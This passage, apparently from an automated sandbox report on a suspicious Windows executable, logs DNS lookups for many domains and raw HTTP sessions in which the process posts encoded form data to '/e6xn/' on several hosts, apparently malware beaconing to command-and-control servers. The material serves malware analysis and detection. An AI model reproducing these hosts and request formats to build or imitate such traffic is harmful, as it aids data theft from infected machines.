                                                                                  Mar 18, 2024 14:49:14.826455116 CET53590491.1.1.1192.168.2.10
                                                                                  Mar 18, 2024 14:49:28.309823990 CET5999153192.168.2.101.1.1.1
                                                                                  Mar 18, 2024 14:49:28.406172037 CET53599911.1.1.1192.168.2.10
                                                                                  Mar 18, 2024 14:49:36.481654882 CET5946953192.168.2.101.1.1.1
                                                                                  Mar 18, 2024 14:49:36.649219036 CET53594691.1.1.1192.168.2.10

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Mar 18, 2024 14:46:04.956136942 CET192.168.2.101.1.1.10xd677Standard query (0)www.cqyh.oneA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:46:05.965495110 CET192.168.2.101.1.1.10xd677Standard query (0)www.cqyh.oneA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:46:21.872291088 CET192.168.2.101.1.1.10x53d1Standard query (0)www.d4ffo73dz.sbsA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:46:37.966083050 CET192.168.2.101.1.1.10x9dffStandard query (0)www.appmystartup.comA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:46:52.575689077 CET192.168.2.101.1.1.10x6e04Standard query (0)www.hondamechanic.todayA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:47:07.560844898 CET192.168.2.101.1.1.10xdc5dStandard query (0)www.oc7o0.topA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:47:20.856565952 CET192.168.2.101.1.1.10xbe03Standard query (0)www.mgn.icuA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:47:35.841558933 CET192.168.2.101.1.1.10xa2e9Standard query (0)www.nikazo.xyzA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:47:50.356764078 CET192.168.2.101.1.1.10x5cc2Standard query (0)www.605alibahis.comA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:48:04.388144016 CET192.168.2.101.1.1.10x9cd0Standard query (0)www.pro-ecoproduct.comA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:48:19.778635979 CET192.168.2.101.1.1.10x2d9cStandard query (0)www.supportstuiwords.comA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:48:33.388081074 CET192.168.2.101.1.1.10x2565Standard query (0)www.syscomputerrd.infoA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:48:52.341204882 CET192.168.2.101.1.1.10x5852Standard query (0)www.agroamsterdam.comA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:49:00.528634071 CET192.168.2.101.1.1.10x54ebStandard query (0)www.dxgsf.shopA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:49:14.716094971 CET192.168.2.101.1.1.10x932fStandard query (0)www.le-kuk.shopA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:49:28.309823990 CET192.168.2.101.1.1.10xe9d2Standard query (0)www.betful.siteA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:49:36.481654882 CET192.168.2.101.1.1.10xf20Standard query (0)www.roblesprats.comA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Mar 18, 2024 14:46:06.098151922 CET1.1.1.1192.168.2.100xd677No error (0)www.cqyh.onevhs.zhaxiyun.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Mar 18, 2024 14:46:06.098151922 CET1.1.1.1192.168.2.100xd677No error (0)vhs.zhaxiyun.com149.88.64.51A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:46:06.098176003 CET1.1.1.1192.168.2.100xd677No error (0)www.cqyh.onevhs.zhaxiyun.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Mar 18, 2024 14:46:06.098176003 CET1.1.1.1192.168.2.100xd677No error (0)vhs.zhaxiyun.com149.88.64.51A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:46:22.845184088 CET1.1.1.1192.168.2.100x53d1No error (0)www.d4ffo73dz.sbsxiaoyue.zhuangkou.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Mar 18, 2024 14:46:22.845184088 CET1.1.1.1192.168.2.100x53d1No error (0)xiaoyue.zhuangkou.com47.76.88.64A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:46:38.365336895 CET1.1.1.1192.168.2.100x9dffNo error (0)www.appmystartup.comappmystartup.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Mar 18, 2024 14:46:38.365336895 CET1.1.1.1192.168.2.100x9dffNo error (0)appmystartup.com144.76.75.181A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:46:52.815578938 CET1.1.1.1192.168.2.100x6e04No error (0)www.hondamechanic.today64.190.62.22A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:47:07.668138027 CET1.1.1.1192.168.2.100xdc5dNo error (0)www.oc7o0.top104.21.63.135A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:47:07.668138027 CET1.1.1.1192.168.2.100xdc5dNo error (0)www.oc7o0.top172.67.145.200A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:47:21.725610971 CET1.1.1.1192.168.2.100xbe03No error (0)www.mgn.icu49.0.230.183A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:47:36.016465902 CET1.1.1.1192.168.2.100xa2e9No error (0)www.nikazo.xyz66.29.152.141A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:47:50.526184082 CET1.1.1.1192.168.2.100x5cc2No error (0)www.605alibahis.com192.64.119.184A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:48:04.784063101 CET1.1.1.1192.168.2.100x9cd0No error (0)www.pro-ecoproduct.com87.236.19.107A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:48:20.037801981 CET1.1.1.1192.168.2.100x2d9cNo error (0)www.supportstuiwords.com154.7.21.55A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:48:33.609872103 CET1.1.1.1192.168.2.100x2565No error (0)www.syscomputerrd.infosyscomputerrd.infoCNAME (Canonical name)IN (0x0001)false
                                                                                  Mar 18, 2024 14:48:33.609872103 CET1.1.1.1192.168.2.100x2565No error (0)syscomputerrd.info50.6.160.34A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:48:52.464885950 CET1.1.1.1192.168.2.100x5852Name error (3)www.agroamsterdam.comnonenoneA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:49:00.624356031 CET1.1.1.1192.168.2.100x54ebNo error (0)www.dxgsf.shopdxgsf.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Mar 18, 2024 14:49:00.624356031 CET1.1.1.1192.168.2.100x54ebNo error (0)dxgsf.shop103.197.25.241A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:49:14.826455116 CET1.1.1.1192.168.2.100x932fNo error (0)www.le-kuk.shop89.31.143.90A (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:49:28.406172037 CET1.1.1.1192.168.2.100xe9d2Name error (3)www.betful.sitenonenoneA (IP address)IN (0x0001)false
                                                                                  Mar 18, 2024 14:49:36.649219036 CET1.1.1.1192.168.2.100xf20No error (0)www.roblesprats.com208.91.197.132A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.cqyh.one
                                                                                  • www.d4ffo73dz.sbs
                                                                                  • www.appmystartup.com
                                                                                  • www.hondamechanic.today
                                                                                  • www.oc7o0.top
                                                                                  • www.mgn.icu
                                                                                  • www.nikazo.xyz
                                                                                  • www.605alibahis.com
                                                                                  • www.pro-ecoproduct.com
                                                                                  • www.supportstuiwords.com
                                                                                  • www.syscomputerrd.info
                                                                                  • www.dxgsf.shop
                                                                                  • www.le-kuk.shop
                                                                                  • www.roblesprats.com

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.1049715149.88.64.51806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:46:06.415072918 CET494OUTGET /e6xn/?bvOt=ptLjcD60OGLEAEKwUIEQaugGR9tSXE/bjIUNt3iL6Qw6jfpYmMXFU+LQzVNpETLyO7HgKKKoK0NH56hBGNACCL/xDZHnLmeKZtapvr1OSuWcevHuIw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.cqyh.one
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:46:06.822541952 CET1186INHTTP/1.1 404 Not Found
                                                                                  Server: kangle/3.5
                                                                                  Date: Mon, 18 Mar 2024 13:46:06 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  X-Cache: MISS from kangle web server
                                                                                  Content-Length: 985
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 27 6d 61 69 6e 27 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 3c 69 3e 3c 68 32 3e 53 6f 6d 65 74 68 69 6e 67 20 65 72 72 6f 72 3a 3c 2f 68 32 3e 3c 2f 69 3e 0a 3c 70 3e 3c 68 33 3e 34 30 34 3c 2f 68 33 3e 3c 68 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 27 72 65 64 27 3e 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 2e 3c 2f 66 6f 6e 74 3e 3c 2f 68 33 3e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 6f 72 20 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 27 3e 74 72 79 20 61 67 61 69 6e 3c 2f 61 3e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 64 69 76 3e 68 6f 73 74 6e 61 6d 65 3a 20 6b 61 6e 67 6c 65 20 77 65 62 20 73 65 72 76 65 72 3c 2f 64 69 76 3e 3c 68 72 3e 0a 3c 64 69 76 20 69 64 3d 27 70 62 27 3e 47 65 6e 65 72 61 74 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 6f 64 65 3d 34 30 34 27 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 6b 61 6e 67 6c 65 2f 33 2e 35 2e 32 31 2e 31 36 3c 2f 61 3e 2e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 27 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 09 76 61 72 20 72 65 66 65 72 65 72 20 3d 20 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 09 76 61 72 20 75 72 6c 20 3d 20 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 55 52 4c 29 3b 0a 09 76 61 72 20 6d 73 67 20 3d 20 27 4e 6f 25 32 30 73 75 63 68 25 32 30 66 69 6c 65 25 32 30 6f 72 25 32 30 64 69 72 65 63 74 6f 72 79 2e 27 3b 0a 20 20 20 20 76 61 72 20 68 6f 73 74 6e 61 6d 65 3d 27 6b 61 6e 67 6c 65 20 77 65 62 20 73 65 72 76 65 72 27 3b 0a 09 76 61 72 20 65 76 65 6e 74 5f 69 64 3d 27 27 3b 0a 09 76 61 72 20 61 61 61 61 61 61 61 20 3d 20 28 27 3c 73 63 72 27 2b 27 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 65 72 72 6f 72 2e 6b 61 6e 67 6c 65 77 65 62 2e 6e 65 74 2f 3f 63 6f 64 65 3d 34 30 34 26 76 68 3d 76 68 73 61 35 37 36 39 38 22 3e 3c 2f 73 63 72 27 20 2b 20 27 69 70 74 3e 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 36 35 66 38 31 36 37 38 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>404</title></head><body><div id='main' ><i><h2>Something error:</h2></i><p><h3>404</h3><h3><font color='red'>No such file or directory.</font></h3></p><p>Please check or <a href='javascript:location.reload()'>try again</a> later.</p><div>hostname: kangle web server</div><hr><div id='pb'>Generated by <a href='javascript: var code=404' >kangle/3.5.21.16</a>.</div></div><script language='javascript'>var referer = escape(document.referrer);var url = escape(document.URL);var msg = 'No%20such%20file%20or%20directory.'; var hostname='kangle web server';var event_id='';var aaaaaaa = ('<scr'+'ipt language="javascript" src="https://error.kangleweb.net/?code=404&vh=vhsa57698"></scr' + 'ipt>');</script>... padding for ie -->... padding for ie -->... padding for ie -->... padding for ie -->... 65f81678 --></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.104971647.76.88.64806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:46:23.153100967 CET754OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.d4ffo73dz.sbs
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.d4ffo73dz.sbs
                                                                                  Referer: http://www.d4ffo73dz.sbs/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 50 44 49 43 48 71 78 2f 4e 49 50 58 6f 5a 4f 52 38 6a 35 57 37 6a 58 56 59 74 39 76 31 57 70 49 2f 32 4d 6c 45 73 65 53 67 4b 4f 43 6a 4e 6b 59 44 68 62 48 53 58 48 45 45 5a 62 72 6c 52 77 4d 34 5a 6f 48 53 4a 69 35 79 62 36 68 39 46 31 31 4e 6d 6d 36 61 74 4b 2b 41 77 38 6a 55 65 78 6c 6d 73 6e 4c 6a 72 7a 74 6f 4d 55 48 47 47 57 43 71 52 59 41 66 72 73 72 6f 47 59 42 43 41 42 69 30 35 41 4b 61 66 30 73 4b 73 4f 33 44 33 72 35 51 34 41 6a 75 77 62 50 4e 38 6e 34 38 4e 58 52 47 35 66 30 35 59 63 7a 77 42 74 30 2f 4c 46 53 75 36 51 53 75 48 69 4c 54 4c 76 35
                                                                                  Data Ascii: bvOt=PDICHqx/NIPXoZOR8j5W7jXVYt9v1WpI/2MlEseSgKOCjNkYDhbHSXHEEZbrlRwM4ZoHSJi5yb6h9F11Nmm6atK+Aw8jUexlmsnLjrztoMUHGGWCqRYAfrsroGYBCABi05AKaf0sKsO3D3r5Q4AjuwbPN8n48NXRG5f05YczwBt0/LFSu6QSuHiLTLv5
                                                                                  Mar 18, 2024 14:46:23.458705902 CET165INHTTP/1.1 405 Not Allowed
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:46:23 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 2
                                                                                  Connection: close
                                                                                  ETag: "65b9f7ed-2"
                                                                                  Data Raw: 31 0a
                                                                                  Data Ascii: 1


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.104971747.76.88.64806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:46:26.987705946 CET778OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.d4ffo73dz.sbs
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.d4ffo73dz.sbs
                                                                                  Referer: http://www.d4ffo73dz.sbs/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 50 44 49 43 48 71 78 2f 4e 49 50 58 72 35 65 52 2b 43 35 57 72 7a 58 4b 64 74 39 76 2b 32 70 4d 2f 32 51 6c 45 75 79 38 68 2f 6d 43 69 76 73 59 41 67 62 48 62 48 48 45 4f 35 62 71 76 78 77 48 34 65 67 6c 53 49 4f 35 79 62 2b 68 39 42 35 31 4d 58 6d 31 62 39 4b 38 5a 41 38 68 4b 75 78 6c 6d 73 6e 4c 6a 72 50 55 6f 4d 4d 48 47 33 6d 43 72 77 59 44 63 72 73 6f 74 47 59 42 56 77 41 70 30 35 41 6b 61 62 56 35 4b 6f 2b 33 44 79 48 35 52 74 73 38 6c 77 62 4a 54 38 6d 30 74 4f 71 37 44 59 75 4c 2f 2b 30 59 75 79 39 71 34 71 6b 56 2f 72 78 46 39 77 2b 46 64 4e 61 54 4c 70 36 62 55 33 53 41 77 4b 34 48 34 4b 4f 6f 52 54 76 43 6d 51 3d 3d
                                                                                  Data Ascii: bvOt=PDICHqx/NIPXr5eR+C5WrzXKdt9v+2pM/2QlEuy8h/mCivsYAgbHbHHEO5bqvxwH4eglSIO5yb+h9B51MXm1b9K8ZA8hKuxlmsnLjrPUoMMHG3mCrwYDcrsotGYBVwAp05AkabV5Ko+3DyH5Rts8lwbJT8m0tOq7DYuL/+0Yuy9q4qkV/rxF9w+FdNaTLp6bU3SAwK4H4KOoRTvCmQ==
                                                                                  Mar 18, 2024 14:46:27.292532921 CET165INHTTP/1.1 405 Not Allowed
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:46:27 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 2
                                                                                  Connection: close
                                                                                  ETag: "65b9f7ed-2"
                                                                                  Data Raw: 31 0a
                                                                                  Data Ascii: 1


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.104971847.76.88.64806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:46:29.813901901 CET1791OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.d4ffo73dz.sbs
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.d4ffo73dz.sbs
                                                                                  Referer: http://www.d4ffo73dz.sbs/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 50 44 49 43 48 71 78 2f 4e 49 50 58 72 35 65 52 2b 43 35 57 72 7a 58 4b 64 74 39 76 2b 32 70 4d 2f 32 51 6c 45 75 79 38 68 2f 2b 43 69 61 67 59 48 7a 6a 48 4a 58 48 45 56 35 62 6e 76 78 77 57 34 59 49 68 53 4a 79 44 79 5a 32 68 38 69 78 31 45 46 4f 31 56 39 4b 38 52 67 38 67 55 65 78 77 6d 73 33 58 6a 72 2f 55 6f 4d 4d 48 47 31 2b 43 76 68 59 44 61 72 73 72 6f 47 59 4e 43 41 41 42 30 36 77 53 61 61 56 70 4b 62 32 33 45 57 6e 35 58 62 59 38 36 41 62 4c 57 38 6e 70 74 4f 6d 67 44 59 6a 34 2f 36 30 79 75 79 31 71 36 66 68 71 71 72 39 39 38 78 2f 65 57 65 53 6a 47 4a 6d 7a 57 6e 54 55 36 49 67 6c 34 4c 2b 2b 59 41 4b 52 36 6c 4b 76 64 50 62 7a 2b 79 79 63 34 68 68 77 38 75 4e 71 45 77 72 66 54 4b 70 68 34 31 4d 76 64 49 66 56 66 2f 71 79 6e 4b 72 72 6e 68 48 44 42 6f 2f 59 67 45 42 73 42 6d 45 4f 51 74 61 65 6a 44 38 2b 4f 65 4d 35 39 6a 6e 6f 5a 71 50 5a 39 6b 6d 65 67 57 39 37 4c 6e 6d 77 42 64 78 52 41 72 49 6d 66 74 67 6e 6d 70 54 57 5a 42 51 66 54 45 4c 49 67 75 30 76 47 56 45 72 35 4b 77 77 63 39 72 5a 79 42 49 4c 39 30 79 6e 4c 79 31 67 34 37 6c 49 69 50 6a 4d 42 38 49 4e 53 30 71 73 33 74 2f 77 44 2b 47 4e 52 74 2b 72 76 2b 67 61 47 78 34 7a 58 47 6d 55 2f 75 45 34 76 43 54 2f 49 59 53 34 45 42 4e 7a 57 37 37 4e 70 72 31 2b 4d 52 63 39 63 69 61 47 31 52 51 56 64 39 4f 67 68 61 42 4d 43 7a 74 36 4a 31 4c 77 70 31 56 37 6c 4e 62 68 48 6a 4c 2f 58 74 51 73 4a 2f 56 73 5a 70 5a 63 45 6a 74 75 7a 57 5a 72 38 62 6d 4b 76 59 4a 65 77 62 76 71 49 4a 76 6f 59 42 77 44 42 73 68 56 77 48 4c 61 59 6e 4d 42 43 4e 6c 56 72 45 58 55 41 65 56 70 53 42 35 74 74 56 6b 59 43 57 6d 69 73 32 62 52 38 4e 63 51 34 70 55 6b 72 54 35 58 59 30 52 42 63 32 32 4a 72 52 76 41 55 37 72 6a 66 37 50 66 50 70 65 6c 71 2f 69 4c 72 38 4f 2f 6f 35 70 67 6a 74 36 4a 47 67 33 37 42 37 6c 43 69 50 68 50 43 2f 51 50 42 52 32 4f 50 62 49 54 6b 4e 6c 61 75 34 45 53 62 58 55 4c 4b 59 7a 69 51 55 41 2b 55 4c 45 39 66 59 53 65 39 4c 64 46 6c 4a 42 2b 65 41 76 56 6d 30 32 41 48 7a 72 66 39 74 44 47 6f 4b 4b 77 77 46 50 78 31 45 4a 4c 78 63 4e 4d 4a 78 77 45 77 39 48 4a 58 71 41 57 47 79 7a 38 6f 47 65 66 6d 31 37 73 51 70 34 79 74 6b 30 4e 56 73 4d 36 43 4b 44 4c 4e 32 32 6f 46 48 66 48 52 31 7a 5a 6b 37 79 2b 55 7a 46 72 68 79 30 32 62 62 74 72 63 4e 72 44 38 77 54 5a 71 65 76 64 2b 55 6a 47 61 54 42 4b 36 70 59 5a 61 5a 39 58 68 37 6a 76 63 74 32 57 54 58 7a 6e 62 65 6d 36 45 6c 35 6d 35 6f 34 51 4f 67 7a 77 31 41 77 52 72 36 53 5a 4c 49 70 6e 4c 34 43 66 55 61 41 2b 61 43 70 63 7a 4f 6f 50 66 2b 50 51 68 42 42 58 79 47 56 4c 69 65 45 42 6b 42 52 65 44 48 52 50 33 58 6e 65 43 4f 62 4c 53 4d 55 76 2f 62 42 6c 6a 41 65 4d 7a 54 51 69 69 6e 63 31 2b 76 72 71 44 76 35 5a 6e 32 69 56 7a 42 5a 49 70 38 6b 79 74 79 4c 7a 6a 65 73 6b 74 6d 31 52 6f 41 34 65 66 59 30 39 6f 43 66 65 5a 37 36 6f 39 53 4f 68 4c 30 42 6e 77 49 75 69 4e 52 62 38 67 35 74 79 6d 61 63 70 74 36 61 57 36 4f 43 34 59 33 70 41 56 74 79 76 66 58 54 51 68 2b 78 61 79 73 37 66 35 71 6b 48 65 46 62 7a 50 2f 77 56 70 35 63 56 72 4a 50 34 4b 4b 66 65 76 2b 62 62 42 73 38 5a 52 36 41 34 45 37 54 70 32 52 4d 31 51 39 32 73 48 49 35 74 4c 6f 39 31 71 56 31 6d 63 4c 51 5a 6c 6c 31 72 68 4a 63 47 71 35 5a 72 71 2f 52 4b 50 50 61 30 4f 2f 44 77 79 61 53 61 65 4d 64 2b 4a 76 2b 47 33 74 43 65 53 63 44 42 37 56 63 79 52 41 30 31 37 56 4e 44 51 57 6d 71 6c 70 6f 48 36 67 37 78 52 41 6b 65 46 45 56 51 5a 47 70 36 63 46 35 68 6d 69 54 4f 4b 66 43 6e 62 52 6f 4c 66 4a 2b 5a 59 36 51 59 31 42 39 47 7a 68 65 54 4b 56 57 39 66 75 79 49 79 5a 43 54 43 33 34 70 4c 55 32 78 6c 74 32 70 51 44 73 66 49 5a 42 72 6a 52 5a 53 31 49 74 66 64 63 5a 4c 54 76 6c 57 63 50 50 35 32 43 78 61 55 37 38 36 56 44 41 3d
                                                                                  Data Ascii: bvOt=PDICHqx/NIPXr5eR+C5WrzXKdt9v+2pM/2QlEuy8h/+CiagYHzjHJXHEV5bnvxwW4YIhSJyDyZ2h8ix1EFO1V9K8Rg8gUexwms3Xjr/UoMMHG1+CvhYDarsroGYNCAAB06wSaaVpKb23EWn5XbY86AbLW8nptOmgDYj4/60yuy1q6fhqqr998x/eWeSjGJmzWnTU6Igl4L++YAKR6lKvdPbz+yyc4hhw8uNqEwrfTKph41MvdIfVf/qynKrrnhHDBo/YgEBsBmEOQtaejD8+OeM59jnoZqPZ9kmegW97LnmwBdxRArImftgnmpTWZBQfTELIgu0vGVEr5Kwwc9rZyBIL90ynLy1g47lIiPjMB8INS0qs3t/wD+GNRt+rv+gaGx4zXGmU/uE4vCT/IYS4EBNzW77Npr1+MRc9ciaG1RQVd9OghaBMCzt6J1Lwp1V7lNbhHjL/XtQsJ/VsZpZcEjtuzWZr8bmKvYJewbvqIJvoYBwDBshVwHLaYnMBCNlVrEXUAeVpSB5ttVkYCWmis2bR8NcQ4pUkrT5XY0RBc22JrRvAU7rjf7PfPpelq/iLr8O/o5pgjt6JGg37B7lCiPhPC/QPBR2OPbITkNlau4ESbXULKYziQUA+ULE9fYSe9LdFlJB+eAvVm02AHzrf9tDGoKKwwFPx1EJLxcNMJxwEw9HJXqAWGyz8oGefm17sQp4ytk0NVsM6CKDLN22oFHfHR1zZk7y+UzFrhy02bbtrcNrD8wTZqevd+UjGaTBK6pYZaZ9Xh7jvct2WTXznbem6El5m5o4QOgzw1AwRr6SZLIpnL4CfUaA+aCpczOoPf+PQhBBXyGVLieEBkBReDHRP3XneCObLSMUv/bBljAeMzTQiinc1+vrqDv5Zn2iVzBZIp8kytyLzjesktm1RoA4efY09oCfeZ76o9SOhL0BnwIuiNRb8g5tymacpt6aW6OC4Y3pAVtyvfXTQh+xays7f5qkHeFbzP/wVp5cVrJP4KKfev+bbBs8ZR6A4E7Tp2RM1Q92sHI5tLo91qV1mcLQZll1rhJcGq5Zrq/RKPPa0O/DwyaSaeMd+Jv+G3tCeScDB7VcyRA017VNDQWmqlpoH6g7xRAkeFEVQZGp6cF5hmiTOKfCnbRoLfJ+ZY6QY1B9GzheTKVW9fuyIyZCTC34pLU2xlt2pQDsfIZBrjRZS1ItfdcZLTvlWcPP52CxaU786VDA=
                                                                                  Mar 18, 2024 14:46:30.114397049 CET165INHTTP/1.1 405 Not Allowed
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:46:29 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 2
                                                                                  Connection: close
                                                                                  ETag: "65b9f7ed-2"
